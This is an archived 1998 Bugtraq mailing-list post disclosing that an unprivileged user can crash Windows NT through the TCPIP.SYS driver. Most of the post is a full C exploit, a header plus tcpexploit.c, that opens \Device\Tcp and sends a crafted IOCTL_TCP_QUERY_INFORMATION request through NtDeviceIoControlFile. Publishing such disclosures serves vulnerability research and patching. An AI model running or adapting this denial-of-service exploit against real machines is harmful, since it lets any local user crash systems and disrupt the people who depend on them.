OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq archives for 3rd quarter (Jul-Sep) 1998: Crashing NT with Native Calls

Crashing NT with Native Calls

Luigi Mori (lmSYMBOLIC.IT)
Wed, 23 Sep 1998 16:16:31 +0000 

Hi,
Playing with TCPIP.SYS I've noticed that every user could crash the
system just calling the undocumented function NtDeviceIoControlFile with
an handle to TCPIP and the "right" parameters.

This is the exploit:

--------------- begin native.h --------------------------
#ifndef gigi_native_h
#define gigi_native_h

typedef struct {
        unsigned int    bo;
        unsigned int    result;
        HANDLE                          hevent;
} nt_overlapped;

#define IOCTL_TCP_QUERY_INFORMATION     0x120003
#endif /* gigi_native_h */
-------------- end native.h ----------------------------
-------------- begin tcpexploit.c ------------------------
#include <ntddk.h>
#include <stdio.h>
#include <tdiinfo.h>
#include "native.h"

#define MAX_NAME_LEN    256

struct {
        HANDLE  h_tcp;
        char    buff[0x400];
} g;


unsigned int
open_tcp()
{
        OBJECT_ATTRIBUTES       object_attrs;
        UNICODE_STRING  device_tcp;
        WCHAR   device_tcp_buff[MAX_NAME_LEN];
        IO_STATUS_BLOCK io_status_block;
        NTSTATUS        status;

        device_tcp.Buffer = &device_tcp_buff;
        RtlInitUnicodeString(&device_tcp, L"\\Device\\Tcp");

        InitializeObjectAttributes(&object_attrs, &device_tcp,
OBJ_CASE_INSENSITIVE, NU
LL, NULL);

        status = ZwCreateFile(&g.h_tcp, 0x20000000, &object_attrs,
&io_status_block, 0,

        FILE_AT
TRIBUTE_NORMAL, FILE_SHARE_READ|FILE_SHARE_WRITE,

                FILE_OPEN_IF,

                0, NULL, 0);
        if(status != STATUS_SUCCESS) {
                printf("ZwCreateFile error %#x %#x\n", status,
io_status_block);

                return 0;
        }

        return 1;
}

void
close_tcp()
{
        ZwClose(g.h_tcp);
}

unsigned int
tcp_query_information(void *in_buff, unsigned int in_buff_len,

        void *out_buff, unsigned int out_buff_len)
{
        NTSTATUS        status;
        nt_overlapped   prova;
        unsigned int i, *p;

        status = NtCreateEvent(&prova.hevent, 0x1F003, 0, 1, NULL);
        if(status != STATUS_SUCCESS) {
                printf("NtCreateEvent error 0x#x\n", status);

                return 0;
        }

        status =  NtDeviceIoControlFile(g.h_tcp, prova.hevent, 0, 0,

                                                        &prova,
IOCTL_TCP_QUERY_INFORMA
TION,

                                                        in_buff,
in_buff_len,

                                                        out_buff,
out_buff_len);

        ZwClose(prova.hevent);

        printf("%#X\n", status);

        return 1;
}

void    __cdecl
main()
{
        struct tcp_request_query_information_ex in_buff;

        if(!open_tcp()) {
                return;
        }

        in_buff.ID.toi_entity.tei_entity = CO_TL_ENTITY;
        in_buff.ID.toi_entity.tei_instance = 0;
        in_buff.ID.toi_class = INFO_CLASS_PROTOCOL;
        in_buff.ID.toi_type = INFO_TYPE_CONNECTION;
        in_buff.ID.toi_id = 0x5;

        if(!tcp_query_information(&in_buff, 0x24, g.buff,
sizeof(g.buff))) {
                return;
        }

        close_tcp();
}
----------------- end tcpexploit.c ---------------------------------

Luigi Mori --
Symbolic (http://www.symbolic.it)
Now Nuclear Free !!!